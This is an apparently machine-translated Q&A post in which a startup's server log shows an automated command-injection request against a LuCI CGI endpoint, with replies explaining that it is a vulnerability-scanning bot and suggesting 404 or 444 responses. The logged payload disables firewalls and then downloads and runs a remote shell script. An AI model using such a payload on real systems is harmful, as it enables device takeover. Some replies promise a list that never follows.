我发现我们新奇的 IT 初创公司的公共服务器正在接收奇怪的请求,显然是某种自动请求。请解释一下这可能是什么?
[GIN] 2023/08/23 - 11:49:28
| 404 | 6.885µs | ip клиента(палить не буду, локация США)
| GET "/cgi-bin/luci/;stok=/locale?
form=country&operation=write&country=$(cd%20/tmp
%3Brm%20zizuo.sh%3Brm%20-rf%20zizuo.sh
%3Bufw%20disable%3Bsystemctl%20stop%20firewalld.service
%3Bsystemctl%20stop%20firewalld%3Bservice
%20iptables%C2%A0stop%3Bwget%20http%3A
//(тут тоже был ip , локация Нидерланды)/zizuo.sh%3Bchmod
%20777%20zizuo.sh%3Bsh%20zizuo.sh)"
我应该分析情况吗(如果是,如何分析)?安全问题值得担心吗?我们对这些人回复 404 好吗?
进行了标准的漏洞搜索。谢谢,该机器人确实在测试 cgi 请求的漏洞。
生成动态内容的最常见方法之一是使用通用网关接口 (CGI),它允许您运行以不同编程语言编写的 Web 内容生成脚本。
默认情况下,该模块已加载,但当前不提供脚本服务;为此,需要在特定环境中启用它,所以就我而言,一切都很顺利。
此类请求的本质是尝试在您的服务器上执行命令,在本例中为以下命令(可以在请求正文中看到它们):
这该怎么办?您可以简单地返回 404,也可以返回非标准代码,例如 444,以便稍后在日志中更容易找到它。如果您愿意,您可以提交有关此类活动的投诉,以下是说明: